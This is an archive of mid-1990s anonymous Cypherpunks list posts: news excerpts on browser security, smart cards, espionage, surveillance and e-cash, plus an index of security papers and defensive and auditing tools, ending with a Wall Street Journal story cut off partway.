@_author: Anonymous 
@_subject: Pointer to 10/9/95 EE Times Article 
Front Page:
`Cypherpunks' asked to breach Netscape, Microsoft security
Desperately seeking hackers
Quotes from Sidebar (How the `Cypherpunks' mailing list works):
"When The New York Times announced a security flaw in Netscape
 Communications Corp's World Wide Web browser software a few weeks
 ago, the `Cypherpunks' hit the big time."
This may be true.  Companies are now asking for their products
to be brutalized by the Cypherpunks' to help ensure security!
This could not be said even a few mere weeks ago.
"According to the group's moderator, who prefers to remain anonymous,
 `The most important means to the defense of privacy is encryption.
 Cypherpunks are therefore devoted to cryptography.  They wish to learn
 about it, to teach it and to implement it.'"
Ok, since when is the Cypherpunk's mailing list moderated?
It is apparent that the author, Larry Lange, has never studied the
list closely or he would know how amusing this sounds...
(Geez, if he had ever read one of Tim May's posts on the subject... :-)
Oh well, at least, I was amused.

@_date: 1995-10-12 15:00:23
@_author: Anonymous 
@_subject: Smart Card Target 
Partnership Targets Billion Dollar Smart Card Market Denver, October 11 -- Racom Systems Inc. has entered into
a multi-million dollar partnership with Rohm Co. Ltd, a
Japanese company, to manufacture the ferroelectric chips
used in contactless, battery-free smart cards. The deal
also calls for Rohm to manufacture a new generation of
advanced microprocessor-based chips currently under
development for use in high-security financial
Rohm is currently starting up a new 0.6 micron wafer
fabrication operation in Kyoto, Japan, dedicated to the
high-volume manufacture or ferroelectric chips, and has
licensed Racom's contactless, battery-free technology
specifically for the Japanese market. Racom said the
cards are already in use in over 100 installations
Racom spokesperson Laura Keane said the
ferroelectric-based smart cards, which exchange
information with readers via radio waves instead of being
passed through a reader like a credit card, are used for
electronic ticketing: automatic fare collection on
buses, subways and trains, electronic point-of-sale, and
electronic benefits transfer.
Racom said the new cards are superior to the earlier
smart cards that use conventional semiconductor
technologies because of their unique combination of
high-speed, low-power, non-volatile operation, and high
The new smart cards have the ability to store as many as
16 different accounts, said Keane. It could hold your
checking account, credit card account, let you pay for a
bus or train ticket, and allow you access to controlled
areas within your workplace.
Keane spoke about some of the card's advantages. In
automatic fare collection, users no longer have to carry
the correct change or tokens, waiting times to board are
reduced, and the risk of robbery of bus, subway and train
operators is reduced since they have less cash on board.
"It's a stored value card," said Keane. "You put money on
the card and daily as you use it you wave it over an
antenna and it deducts the fare for that day."
Keane said electronic ticketing primarily benefits the
frequent traveler. The user would simply wave their card
over an antenna at a kiosk in the terminal after
selecting their destination and class of accommodation
for immediate ticketing. The card would have your seating
preference and frequent flyer number recorded and would
provide that information to the ticket machine.
According to Jerome Svigals, publisher of Smart Cards &
Comments and a consultant to the electronic banking
industry, contactless technology is very valuable to the
user because of its speed, convenience, ease of use, low
cost and perhaps most importantly its security. "Even
more significant is this smart cards' ability to manage
multiple applications with contactless technology that
ensures the highest long-term data integrity, especially
important for electronic purse requirements," said the
industry consultant.
Press contact: Laura Keane, Racom Systems, 800-789-7627;
Public contact: 800-789-7627.

@_date: 1995-10-13 05:09:56
@_author: Anonymous 
@_subject: Insecurity Section of the Internet Handbook 
For zoetrope, and others curious about the Insecurity
section of the Internet Handbook, we pass along this
Yellow Pages advert-insert comp sec teaser from
SAIC -- with only dribbles of cryptography. The puffery
appears to be artfully fattened and out-of-date. Like most
security porkers, SAIC sells its nitrated sec services
dearly (security by deep pockets of the fearful engorgers)
while feigning Net public-spirit to mask IP search and
steal. In a telling slight, SAIC does not cite outturned-
pockets, beef jerky Cypherpunks.
URL:  [which links to the
listed contents]
                   SECURITY LIBRARY
The SAIC Security Library contains security-related infomation and programs from around the Net. SAIC does
not verify or endorse such files or any use thereof.
Notices and Upcoming Events [Not included here]
Advisories and Alerts
Other Security Sites
URL:             SECURITY ADVISORIES AND ALERTS
   *  Sun Security Alerts
   *  CERT - Computer Emergency Response Team
   *  ASSIST - Automated Systems Security Incident
      Support Team
   *  AUSERT - Australian Security Emergency Response
      Team
   *  NASIRC - NASA Automated Systems Incident Response
      Capability
   *  DDN - Defense Data Network
   *  FIRST - Forum of Incident Response and Security
      Teams
   *  8lgm Advisories
   *  Bugtraq Archives, threaded
   *  CERT Advisories
   *  CIAC - Computer Incident Advisory Capability URL:                   SECURITY DOCUMENTS
These documents are from the Net and cover a wide area of
topics concerning computer security. They are for the
education and legitimate use of computer security
techniques only. All non-FAQ documents are in PostScript
format unless otherwise noted.
Frequently Asked Questions
   *  Basic Computer Security
   *  Firewalls
   *  Setting Up Anonymous FTP
   *  What To Do If Your Machine Is Compromised
   *  Security Patches
   *  Vendor Contacts
   *  Pretty Good Privacy (PGP)
   *   FAQ
   *  Cryptography FAQ    Introductory Papers
   *  Internet Firewalls - An Introduction (August 1994,
      221K)
   *  Keeping Your Site Comfortably Secure: An
      Introduction to Internet Firewalls (Undated, 1.8M)
   General Firewall Documents
   *  A Network Firewall (June 1992, 374K)
   *  A Toolkit and Methods for Internet Firewalls
      (Undated, 185K)
   *  Proper Care and Feeding of Firewalls (November
      1994, 121K)
   *  A Network Perimeter with Secure External Access
      (Undated, 268K)
   *  An Internet Gatekeeper (Undated, 149K)
   *  Thinking About Firewalls (Undated, 109K)
   *  X Through Firewalls, and Other Application Relays
      (May 1993, 430K)
WWW Security
   *  Security and the World Wide Web (June 1994, 10K
      HTML)
   *  NCSA on Mosaic Security Issues(December 1994, 1.6K
      HTML)
   *  Shen: A Security Scheme for the Web (Undated, 1.7K
      HTML)
   *  Using PGP/PEM Encryption (Undated, 7.6K HTML)
   *  Secure HTTP (Undated, 2.2K HTML)
Intrusion Detection
   *  A Software Architecture to support Misuse
      Intrusion Detection (March 1995, 250K)
   *  An Application of Pattern Matching in Intrusion
      Detection (June 1994, 674K)
   *  Algorithm for Distrubuted Recognition and
      Accountability (Undated, 209K)
   *  A Pattern Matching Model for Misuse Intrusion
      Detection (Undated, 191K)
   *  AI Approach to Intrusion Detection (June 1994,
      168K)
   *  Intrusion Detection In Computers (January 1991,
      12K text)
   *  USTAT - A Real-time Intrusion Detection System for
      UNIX (November 1992, 1.3M)
Improving your UNIX Security
   Technical Tips
   *  Setting up Sun Security (March 1992, 7K text)
   *  Miscellaneous Security Tips (October 1992, 23K
      text)
   *  CERT Generic Security Tips (July 1992, 17K text)
   *  UNIX Site Security Handbook (July 1991, 253K text)
Finding and Fixing Your Security Problems
   *  Improving the Security Of Your Site By Breaking
      Into It (Undated, 51K text)
   *  Finding Holes in Your System (October 1993, 16K
      text)
   *  Improving the Security of Your UNIX System (April
      1990, 274K)
   *  Becoming An Uebercracker to Stop Uebercrackers
      (December 1993, 9K text)
The Internet Worm
   *  A Report on the Internet Worm (November 1988, 16K
      text)
   *  Technical Report on the Internet Worm Incident
      (September 1991, 173K)
   *  The Internet Worm Program: An Analysis (December
      1988, 283K)
   *  A Tour of the Worm (Undated, 166K)
Tales of Computer Attacks and Countermeasures
   *  Five Incidents At Columbia University (Undated,
      93K)
   *  "An Evening With Berferd" (Undated, 82K)
   *  Internet Attack on Texas A&M (1993, 294K)
   *  "There Be Dragons" (August 1992, 185K)
   *  Computer Break-ins: A Case Study (Undated, 94K)
   *  System Admin Horror Stories (1992, 148K text)
   TCP/IP Security
   *  TCP Wrapper Security (Undated, 59K)
   *  A Weakness in the 4.2BSD TCP/IP Software (February
      1985, 27K)
   *  Security Problems in the TCP/IP Protocol Suite
      (April 1989, 107K)
   *  Network (In)Security Through IP Packet Filtering
      (September 1992, 123K)      General Networking Documents
   *  Architecture and Implementation of Network-Layer
      Security under UNIX (Undated, 124K)
   *  Information Security And Privacy In Networks
      (Undated, 809K .tar file)
   *  Paving the Road to Network Security (May 1994,
      162K)
   *  NFS Tracing By Passive Network Monitoring
      (Undated, 170K)
             *  Addressing Weaknesses in the DNS Protocol       1993, 406K)
   *  Countering Abuse of Name-Based Authentication
      (Undated, 243K)
   *  An Architectural Overview of UNIX Network Security
      (May 1993, 50K text)
   *  NIS Security Warning (December 1991, 7.5K)
Trusted Systems
   *  The Orange Book (August 1983, 264K text)
   *  Understanding Configuration Management in Trusted
      Systems (March 1988, 138K text)
   *  Understanding DAC in Trusted Systems (September
      1987, 87K text)
   *  Understanding Facility Management in Trusted
      Systems (June 1989, 106K text)
   *  Understanding Trusted Distribution in Trusted
      Systems (December 1988, 55K text)
   *  Understanding Audit in Trusted Systems (July 1987,
      56K text)
   *  COAST Newsletter
   *  Privacy Forum
   *  Cipher - Electronic Newsletter of the IEEE
      Technical Committee on Security and Privacy
Miscellaneous Documents
   *  Security Term Glossary (Undated, 70K text)
   *  Open Systems Security - An Architectural Framework
      (June 1991, 300K text)
   *  Password Security: A Case History (Undated, 36K)
   *  Extracts from various security articles (Undated,
      61K text)
   *  Coping with the Threat of Computer Security
      Incidents (June 1990, 102K text)
   *  Threat Assessment of Malicious Code and Human
      Threats (October 1992, 231K)
   *  Tty Security - a Tty Session Manager (Undated,
      98K)
   *  Electromagnetic Emanation Eavesdropping (1989, 45K
      text)
   *  GAO Report on Internet Security (June 1989, 104K
      text)
   *  ACM SIG on Security, Audit, and Control
URL:                    SECURITY PROGRAMS
These programs are from various locations around the Net;
SAIC does not verify their functionality and/or
consequences of use. All programs are for assumed legal
uses and education. Unless noted, all programs are
intended for UNIX platforms.
Local (load directly to disk; gzip tar files unless
   *  COPS - Bulletproof your system from intruders
   *  Crack - Password cracker
   *  Cryptography File System (CFS) - Encrypted
      filesystems for SunOS
   *  Internet Security Scanner (ISS) - Checks UNIX
      sites for vulnerabilities
   *  ifstatus - Checks interfaces for promiscuous mode
   *  probe_ports - Finds open ports on UNIX systems
   *  Secure-Sun Check - Shell script to check several
      common SunOS vulnerabilities (no compression)
   *  Arpwatch - Ethernet monitor, keeps track of
      ethernet/IP address pairings
   *  Chalance - Intercept-proof password authentication
   *  chrootuid - Run network programs in a mininal
      environment
   *  CBW - Code Breaker's Workbench
   *  Courtney - Identifies the use of SATAN
   *  Dig - Sends domain name query packets to name
      servers
   *  DNSWalk
   *  Drawbridge - A bridging filter from TAMU
   *  Kerberos - Provides secure networking
   *  MegaPatch - Large number of SunOS patches in one
      bundle
   *  Netlog - TCP/UDP traffic logging system
   *  PGP - Pretty Good Privacy
   *  Portmap - Portmapper replacement, with access
      control
   *  SATAN - Checks computers/networks for security
      vulnerabilities
   *  Securelib - Protects RPC daemons
   *  screend - Filters IP packets
   *  Smrsh - Sendmail restricted shell
   *  Socks - Allows Internet access to firewalled
      machines
   *  SRA - Secure RPC Authentication for Telnet and FTP
   *  TAMU - Texas A&M Security Tool Package
   *  tcpdump - captures protocol packets from networks
   *  TCP Wrapper - ACLs for network services
   *  Tiger - Scans your UNIX system for security
      problems
   *  TIS Firewall Toolkit - Firewall package from TIS
   *  Tripwire - Watch for system file changes
   *  Watcher - Watches your system for security
      problems
URL:                  OTHER SECURITY SITES
   *  International Assoc. for Cryptologic Research
   *  Cryptography Web Page at UMBC
   *  Cryptography Export Control Archives
   *  Lawrie's Cryptography Bibliography
   *  RSA Data Security, Inc.
   *  Quadralay's Cryptography Archive
   *  Cryptography, PGP, and Your Privacy
   *  PGP Web Page
Firewall Vendors and Information
   *  Harris Computer Systems
   *  Sun Microsystems (SunScreen)
   *  Trusted Information Systems
   *  Cohesive Systems
   *  Sea Change Corp.
   *  Raptor Systems
   *  Greatcircle Firewall Server
   *  Virtual-One Network Environment Corp (V-ONE)
   *  CheckPoint Software Technologies Ltd.
   *  Firewalls.R.Us
Security Gophers
   *  InterNIC's Computer and Network Security
   *  NIST Security
   *  Security, Audit & Control (SIGSAC)
World Wide Web Security
   *  WWW Security Mailing List Archive
   *  WWW Security at Rutgers University
Intrusion Detection
   *  Intrusion Detection Systems Archives (threaded)
PC Security
   *  Safetynet, Inc.
Various Security Sites
   *  Computer Security Research Lab at UC Davis
   *  Computer Security at chalmers.se
   *  Harris Computer Systems
   *  Szymon Sokol's Security Site
   *  The Uebercracker's Web Site
   *  COAST Project and Laboratory
   *  Computer Underground Digest Archive
   *  Security News Clippings Archive
   *  EINet's Computer Virus and Security Page
   *  Crimelab
   *  Phrack Magazine Home Page
   *  TANSU's Security Reference Index
   *  Digital Equipment's Secure Systems Index
   *  Bellcore Security Products
   *  Texas A&M security tools
   *  ftp.win.tue.nl
   *  NIST Computer Security Resource Clearinghouse
   *  Christopher Menegay's Security Page
   *  Security Papers at Johns Hopkins University
   *  Dartmouth Security Tools
   *  CERT FTP Archive
   *  Computer Systems Consulting
   *  Computer Systems Consulting (Local Files)
   *  MIT's Athena Project
   *  Yahoo's Security and Encryption Page
   *  NIST Computer Security
   *  ALW Unix Security Information
   *  ALW's List of Unix Security Programs
   *  ESNet FTP site
   *  Bennet Yee's Security Page
   *  Various security FTP pointers
Send questions and comments to Webmaster at mls.saic.com.

@_date: 1995-10-16 00:40:35
@_author: Anonymous 
@_subject: robo remailerRE: robo remailer 
c2.org expired and was cancelled, thus the remailer is down.
Previously, it had been a full-fledged cypherpunk-type remailer,
with Type II (Mixmaster) capabilities, to boot.
Such are the uncertainties of using remailers.  What would have been
nice, of course, would have been for Sameer (sameer at c2.org), or
whoever runs Community Conexxion, to post a bulletin here giving
everyone a few days' notice before pulling the plug on this
remailer.  Undoubtedly, people are still chaining through it and
wondering why their messages/posts are not showing up.
NOTE:  People with anon reply blocks from alpha.c2.org that chained
through robo need to replace them, or risk lost messages!

@_date: 1995-10-16 04:32:06
@_author: Anonymous 
@_subject: Japan-CIA 
Tokyo (AP) -- Japan said that its relations with Washington could be seriously damaged if a report that the CIA spied on Japanese representatives at auto talks proves true. The New York Times reported Sunday that the CIA eavesdropped on conversations between Japanese negotiators and automakers during the talks in Geneva this year, reporting the results daily to U.S. Trade Representative Mickey Kantor. According to the report, Kantor was provided with summaries of conversations between Japanese bureaucrats and executives from Toyota Motor Corp. and Nissan Motor Co. Toyota called the alleged eavesdropping ``unthinkable,'' but refused to comment further.

@_date: 1995-10-16 06:36:16
@_author: Anonymous 
@_subject: OS$ Hackwork 
URL: [Condensed version of ad in Wash Post 10-16-95]
Register Now For OSS '95: Fourth International Symposium
Global Security & Global Competitiveness: Open Sources
Solutions.  7-9 November 1995 in Washington DC
[Excerpt on workshops]
Hacker Panel (will be repeated 9 Nov 95). Winn Schwartau,
Chris Goggans, Eric Hughes, Emmanuel Goldstein on
specific vulnerabilities of typical national
communications and computing infrastructures, with
specific suggestions for improving both defense and
counter-intelligence against electronic terrorists and
criminals. Invited commentary from DISA, NSA, FBI.
Spys, Scholars, Hackers, Competitive Intelligence
Analysts, Law Enforcement Analysts, Private
Investigators, Journalists, and Information Brokers
Unique conference, acclaimed in the international media
and respected in professional circles. Addresses open
source intelligence (OSINT) strategy, policy, collection,
production, and hands-on specifics. Of vital interest to
all those who consider themselves experts or "knowledge
workers". OSS '95 will feature 25 world-class speakers in plenary session, 25 interactive interest and training groups, and 75 carefully-screened international exhibits.
Subject Area Themes [with TLA$ galore, gov and ex-s in biz]
7  Nov: Economic Competitiveness & Information Warfare
8  Nov: Military Operations Other Than War
9  Nov: Transnational & Domestic Law Enforcement
This year's conference includes several half-day pre-conference workshops on 6 November [including "two
hacker workshops"]:
1) an orientation on open source intelligence for
   first-time attendees,
2) the National Military Intelligence Association will
   conduct a workshop on "Defensive Information War
   Technology", and
3) the Operations Security Professionals Society will
   conduct sessions on open source counterintelligence
   and open source operations security measures.
To register or exhibit:
Voice: (703) 242-1700 / Facsimile: (703) 242-1711
 or Open Source Solutions, Inc.
International Public Information Clearinghouse
11005 Langton Arms Court, Oakton, VA 22124

@_date: 1995-10-16 10:40:35
@_author: Anonymous 
@_subject: [Honk] FR $ec vs US $ec 
Excerpted from: URL:                 OSS Notices, July, 1995
       France Identifies USA as "Main Adversary"
The following material is so important that we have
chosen to reprint it in its entirety from Intelligence
Newsletter, which we continue to recommend highly.  Call
them at (33 1) 44 88 26 10 for a sample issue or to order
your subscription.
            FRANCE: Ringing the Alarm Bells
"For the first time in France, a boss of the country's
Direction de la Surveillance du Territoire (DST) spoke in
public at a seminar on the theme "Companies and Business
Intelligence" that was laid on by the Institute des
Hautes Etudes de Defense Nationale (IHEDN) at the French
Senate on July 4.  As he himself declared on the
occasion, Philippe Parant agreed to speak out 'despite
the special nature' of his functions in order to alert
French business circles of the dangers of 'economic
warfare'.  To be sure, the main aim of the gathering
which drew a full house was to ring the alarm bell. According to Gen. Bernard Norlain, head of IHEDN,
economic warfare now forms part and parcel of 'an overall
approach to defence'.  IHEDN will dispense a course on
business intelligence to 30 high-level trainees in the
"Most of those who spoke at the seminar identified the
U.S. as both the main adversary in the war and the best
model of how it is fought.  This was especially the case
of Francois David, head of French export credit guarantee
agency COFACE who said the only response to the U.S.
'could be European' in scale.
Elsewhere, Remy Pautrat, deputy dead of France's
Secretariat General de la Defense Nationale (SGDN) paid
tribute to the French  president for signing a decree on
April 1 that gave birth to a Comite pour la Competitivite
et la Security Economique under the authority of the
French Prime Minister.  Pautrat said the Committee formed
"the nerve center of a more ambitious system" that was
currently being set up, partly in secret."
             FRANCE-the DST's New Defences
"During the seminar cited above DST chief Philippe Parant
reckoned that economic, scientific, and industrial
espionage had increased considerably over the past few
years.  It now accounted for 60% of cases that come to
the authorities' attention compared to 40% for political,
diplomatic, and military spying. Methods had also changed
because state-sponsored espionage had increasingly taken
a back seat to a type practices by private intelligence
companies, international audit firms, head-hunter
concerns, as well as insurance and reinsurance companies. Parant said that effective defence against the onslaught
could not come from government services alone.  "If that
were the case the game would be lost in advance," he declared.  He suggested that as many staff as possible in
big companies be made aware of business intelligence
concerns.  In addition he called for "genuine
information-management training in engineering
universities."  For maximum impact, he said, such
training should not be dispensed by security services but rather by specialists in each specific discipline."
                L'Expansion Cover Story
With the above background in mind, we can now better
understand the cover story in L'Expansion of 10-18 July
1995.  This prestigious journal, widely regarded as the
French equivalent of Forbes, Fortune, and Business Week,
appears to have been manipulated by French civilian
intelligence and self-promoting private sector business
intelligence activities.
The cover story of L'Expansion is nothing less than a
call to arms for the French business community, and the
opening declaration of war on the United States of
America.  Unfortunately, this article was very likely
drafted in active cooperation with French civilian
intelligence experts, and should be considered a "covert
media placement".
I have taken a personal interest in the article because
it links me with President William Clinton, Director of
Central Intelligence John Deutch, and the founder of
Kroll Associates, Jules Kroll.  I am honored.  Sadly, the
article, while identifying me as the apostle of open
source intelligence, is gravely in error when it
identifies me as the linch-pin for a new covert strategy
to undermine the French economy, and also alleges that I have been actively discouraged from implanting myself
in France by the French authorities.
There are three "realities" that need to be explored
here.  First, there is a budget battle going on in
France, and the French civilian intelligence services are
doing everything they can to "hype" the threat and obtain
increased manning and funding.  This should not surprise
us, but the apparent subversion of the previously
prestigious journal L'Expansion to the desires of French
civilian intelligence, is cause for concern.
Second, my sources in France tell me that the larger
French companies, especially those in the defense sector,
do not take this threat seriously because they are much
superior to U.S. companies at the business of industrial
espionage.  A very well-informed source has suggested to
me that this cover story is the result of an alliance
between French civilian intelligence (attempting to
increase its budget) and General Pichot-Duclos of
INTELCO, who is attempting to increase his business
practice among the small businesses in France foolish
enough to believe in this exaggerated threat.
Finally, for the record, I wish to note that I was
invited to France by Mr. Francois Leotard, the Minister
of Defense, with the explicit approval of Prime Minister
Balladur, in order to join Admiral Pierre Lacoste,
General Jean Heinrich, and General Jeannou Lacaze in
speaking to a very select group of 300 French leaders
from government, industry, and the  academy on 23 October
1993.  We spoke about the need to reinvent intelligence
and significantly increase reliance on open sources.  The
presentations that these distinguished flag officers and
I made have been published in a book  called Defence and
Intelligence, available (in French) from Editions
L'Harmattan, 5-7, rue de l'Ecole-Polytechnique, 7500
5 Paris.
Robert D. Steele, Publisher
Open sources Solutions, Inc.
International Public Information Clearinghouse
11005 Langton Arms Court, Oakton, Virginia 22124-1807

@_date: 1995-10-19 06:35:39
@_author: Anonymous 
@_subject: SciAm Bye-Byes Privacy 
Scientific American, November, 1995
Rights of Privacy
Technology has its eyes on you
Privacy, as George Orwell pointed out, rests on some
level on a bargain between people and their machines.
Long before 1984, communications technology had the
potential to become surveillance technology. Now it is.
Not, as Orwell might have predicted, because Big Brother
wants to keep his subjects in thrall but simply because
most people want it to be. By giving up some protective
anonymity, people get safety and service. A majority seem
to think the bargain a very good one -- which is why
everybody should look very carefully at the fine print.
Somewhat ironically for the nation that gave birth to
Orwell, Britain is leading the way in creating the kind
of society that he taught the world to fear. More than
300 British city streets are wired for 24-hour
surveillance by closed-circuit television cameras. From
control rooms, police and private security officers scan
everything that moves, or doesn't, and dispatch police
officers to investigate anything suspicious.
More cities are getting wired all the time, often by
popular demand. Whatever qualms Britons have about
privacy, they are more concerned about crime. The cameras
do seem to reduce crime -- at least in the areas
underneath the cameras. Academics point out that
surveillance seems to have no impact whatsoever on the
overall level of crime, which is rising, but people just
don't seem to care about where the muggers go when they
leave their neighborhood -- particularly when their
neighborhood wasn't too good to begin with.
Safety is not the only reason to embrace surveillance. At
the Olivetti Research Laboratory in Cambridge, for
instance, Andy Hopper and his staff have for years worn
tiny badges that inform their computers where they are
each minute. The point is convenience. Computers
automatically bring to the screen the work of the person
sitting in front of them. Calls are forwarded to the
telephone nearest wherever they happen to be -- unless
the computers detect three or more badge wearers gathered
in the same office, in which case they are assumed to be
in a meeting, and calls are forwarded to their voice
To make life more convenient still, Hopper is trying even
cleverer technologies. Some chairs now contain compasses
that monitor whether they are pointed at a screen, and,
if not, the screen is dimmed to save power. Such devices,
Hopper reckons, are crucial to making computers
effortlessly easy to use. As he puts it, "You can't have
personalization without identification."
But the search for personalization in a high-tech world
may create an uncomfortable situation in the global
village. Villages are safe places but not very private
ones. Mrs. Grundy, peering from behind her lace curtains,
did stop housebreakers. but she also tried to halt many
other things of which she disapproved. There are signs
that Grundyism is returning to Britain. Many of the
crimes recorded by surveillance cameras are worryingly
petty. Arrests for urinating in public have soared. For
better and for worse, cameras that can see in the dark
now line romantic walks to the beaches in seaside towns.
In Britain, as elsewhere, technology and politicians are
about to deepen the privacy dilemma. Cameras are being
linked to smarter computers that can identify people.
Some drivers receive tickets without human intervention.
Video cameras check their speed and read their license
plates. Along with a ticket, the owner is sent a
photograph of the car and driver at the time the speeding
was clocked. A number of companies are touting technology
that can recognize faces by matching video images to
digitized photographs (from, say, drivers' licenses).
The British government, like many others, is also
discussing plans for a national identity card that would,
by giving everyone a number, make it easier to keep track
of personal data. The selling point is convenience. Much
of the work of filling out forms in bureaucratic Britain
is simply to give one branch of government information
that another part already has -- or to correct
information that bureaucrats have got wrong.
Convenient though it may be in theory, the combination of
national identity schemes and surveillance cameras
promises to give governments many of the powers of an
all-seeing God. And there are many reasons to worry that
mere humans would not be as merciful or as competent. Two
aspects of surveillance will prove crucial in determining
the practical terms of the new privacy bargain now being
struck: choice and reciprocity.
Unlike the subject of video surveillance, the wearer of
one of Olivetti's badges can remove the device and
disappear from the system. His electronic identity is
entirely a voluntary one: if he wishes to forward all the
telephone calls the old-fashioned way, by hand, there is
nothing to stop him. Surveillance becomes less intrusive
if it is optional. But choice cannot be a cure for all
the potential ills of surveillance. As electronic
personalization makes electronic identification more
important, that choice becomes harder to manage.
One problem is forgery. If electronic identities can be
taken on and off like sweaters, the risk that fraudsters
will be able to put on somebody else's identity rises.
Besides, as such identification becomes more important,
the sheer effort required to live anonymously will render
choice moot. Anonymity will simply become too much work.
Real village traditions offer hope for the lazy and the
identifiable. In village life, surveillance was
reciprocal: if Mrs. Grundy knew a lot about you, you also
knew a lot about her -- and you knew what she knew about
you. Technology should further extend this reciprocity.
The badges in the Olivetti lab provide a way of locating
any badge wearer. But they also allow badge wearers to
track anybody who is trying to locate them. There can
indeed be no personalization without identification, but
there is increasingly little excuse for identification
without notification. The same computers and networks
that send faces, names and numbers whizzing around the
world could also be required to send notification back to
each of those identified, each time they have been
spotted. Even as the world becomes more personalized and
less private, there is no reason for the electronic
global vilage to become less personable than a thatched
one, or less fair. Photo caption: Video cameras will scan the crowd at the
1996 Olympic Games in Atlanta. The security system can
transmit images for identification.
--John Browning
The issue also has a brief report by Paul Wallich on
"Meta-Virus: Breaking the hardware species barrier,"
which reviews recently-publicized security flaws in the
Net, with quotes by William Cheswick of AT&T Bell Labs on
the issue and Hot Java.

@_date: 1995-10-19 07:00:36
@_author: Anonymous 
@_subject: SciAm's Crypto Stego Pushup 
Scientific American, November, 1995
Doing Business on the Net
By Anne Eisenberg Like the leaves of autumn, those resolutely noncommercial
days on the Internet when ads were anathema are dwindling
fast. Nowadays the Internet's World Wide Web has so much
commercial promise that it has spun off an association
called the HTML Writers' Guild (http:
literate in Hypertext Mark-up Language (HTML is the
language of the Web) to create dramatic "home pages,"
sites on the Web where a growing number of businesses
advertise their wares. "We're there for the same reason
we have banks in malls," one Citibank executive
explained. "It's where people congregate."
Web ads are quickly evolving into arresting combinations
of sound, text and vivid, point-and-click picture links
called image maps. Computer science students who were
once stern critics of business on the Net now eye the ads
appreciatively, so long as they are not "in your face" --
inserted where people have no choice but to look at them.
Besides, commercials may one day pay for Net services,
much as they now underwrite programs on radio and
television. And the ads are convenient: click on the
icon, read about the product and order, all in one step.
Many companies arc poised to put not only advertisements
but entire catalogues on the Web as routinely as they now
list their services in me Yellow Pages. After all, if
e-mail could hatch a generation of letter writers by
eliminating the bother of envelopes and stamps, surely
commerce should blossom when paper catalogues fall, and
we all start buying straight from the screen.
For business to thrive, though, people will need a secure
way to pay and be paid on the leaky Net, where messages
containing credit-card numbers can be intercepted as they
travel from machine to machine. And all those prospective
shoppers, entrepreneurs and micromerchants will want not
only secure payment mechanisms but also a choice -- cash,
check or charge -- before they hit the convenient,
brightly colored order links. Inspired by a vision of
untold millions buying and selling on the Net, companies
and banks (among them Chase Manhattan, Citibank,
CyberCash, DigiCash, Mondex and Microsoft) have joined
what is being called the Gold Rush of 1995, as they race
to become the Great Central Biller in the Sky.
No victors have yet emerged, but early leaders are
probably going to provide security in the form of
public-key, (PK) cryptography, ingenious algorithms that
use pairs of unique numerical "keys" for encoding and
decoding messages. If you use PK software for an online
shopping trip, you will have your own pair of keys, one
public and one as private as the identification number
you use to get cash from an automated teller machine.
When you order, your program will automatically encrypt
the information with your private key. When the company
uses your public key to decode the order, it will know
without question that the message was generated by you --
the match is the digital signature that authenticates the
transaction. Companies in turn will encrypt messages to
you with your public key; the messages will be secure,
for only you can decrypt and read them, using your
private key. Netscape and other new Web browsers --
software that lets you travel to linked Internet
resources without typing complicated addresses -- are
known as encrypting browsers; they are ready to help you
shop securely on the Net. Some will even come with
built-in PK signatures.
Whether the cryptographically cloaked digits of e-money
will bestow privacy in addition to security is another,
far more contentious matter. When people start using
e-wallets instead of cash to rent a video or lend a
friend $20, fertile new areas for infringing on privacy
will bloom. Electronic dossiers can be compiled by
automated systems that track spending habits. Many people
will not want the details of their daily lives collected
and stored in, say, consumer preference data banks,
joining the folders that already document their health
and credit ratings.
Only a few of the emerging electronic payment systems
address privacy issues. The untraceable digital cash
closest to hand is probably Chaumian cash, named in honor
of David Chaum, founder of DigiCash and of the
cryptographic protocols that underlie his anonymous
digital-money technology. Chaum's patented e-cash is an
adaptation of PK cryptography that includes one-way
privacy for the payer. The bank can verify that the money
is genuine but is blinded from identifying the source.
This means you will be able to prove you have made a
payment when you need to, but the bank cannot flick a
switch to retrieve the records of your travel and
entertainment preferences and add them to its data-mining
The terminology of electronic commerce reflects the clash
of cultures that has come about as the youthful language
of the Net meets the austere discourse of banking. The
jaunty "e-" prefix has attached itself firmly to Nettish
talk of the e-wallets and e-purses that we will soon be
using to make our e-payments. But bankers resist this
linguistic cheeriness. They substitute "digital" for
"electronic" whenever possible and never shorten it to
"d-" when they speak of the digital time stamps and
digital signatures they will soon offer us to
authenticate our digital payments. And cryptography
(known affectionately as crypto on the Net) is still a
four-syllable word at the bank, where it is against
nature for managers to be linguistically fond of any
action that commits them to untraceable communications
and exchanges.
We will know the new, hybrid field of electronic commerce
is truly on its way when banking ads on the Web offer
"strong crypto" and even, as a backup, steganography (the
science of hiding the existence of messages in, say,
microdots or sound files) for telephone chats with loan
officers. On the Net, of course, this service is already
known as stego.
Anne Eisenberg (aeisenb at duke.poly.edu) conducts her
e-business at Polytechnic University in Brooklyn, N.Y.

@_date: 1995-10-23 18:06:13
@_author: Anonymous 
@_subject: Similar Lists 
Looking for recommendations for any other mailing lists which allow one to stay current, on similar topics...

@_date: 1995-10-24 11:55:18
@_author: Name Withheld by Request 
@_subject: Hack DigiCash: Payee Anonymity 
Right.  Both payer and payee should introduce their own blinding factors.
Now all we need is to do is get some specs on how DigiCash's software works
so that we can code this.  I expect that this method will become quite
popular.  To withdraw DigiCash, one must come up with $250 to start, sign a
bunch of forms, etc.  I suspect that most people would rather change money
in lesser amounts, probably under $50.  This opens up a huge market for
Blacknet money exchangers.  I would gladly pay Tim's Internet Cash Exchange
a commission to exchange $50 worth of greenbacks for Digicash instead of
dealing with Mark Twain and shelling out $250 to start..

@_date: 1995-10-25 11:02:04
@_author: Anonymous 
@_subject: arg 
"The average seasoned citizen pays a higher percentage of his income for
medical expenses today than he did in 1964 before the passage of Medicaid."
      Do you set aside a quiet hour every day to think up this crap?

@_date: 1995-10-25 15:41:38
@_author: Anonymous 
@_subject: E-mail Spy 
The Wall Street Journal, October 25, 1995.
A '90s Espionage Tale Stars Software Rivals, E-Mail Spy
By Glenn Simpson
Technothriller novelist Tom Clancy might have a hard time
dreaming this one up.
In a computer-age case of spy vs. spy, a small software firm
is claiming to have uncovered an industrial espionage attempt
by a much larger competitor by using a controversial e-mail
Court documents and interviews tell a tale of intrigue,
deception and twist upon twist. Not to mention the alleged
involvement of a mysterious "classified government agency."
The protagonist is Performix Inc., a closely held
eight-year-old firm in McLean, Va., that has carved out a
significant niche for itself producing Empower, a software
program used for "load testing," which measures the ability of
a software program to serve many users simultaneously. Every
major computer manufacturer now uses Empower.
Enter Mercury Interactive Corp., a $300 million publicly
traded California firm that also is in the business of selling
software-testing products and produces competing software
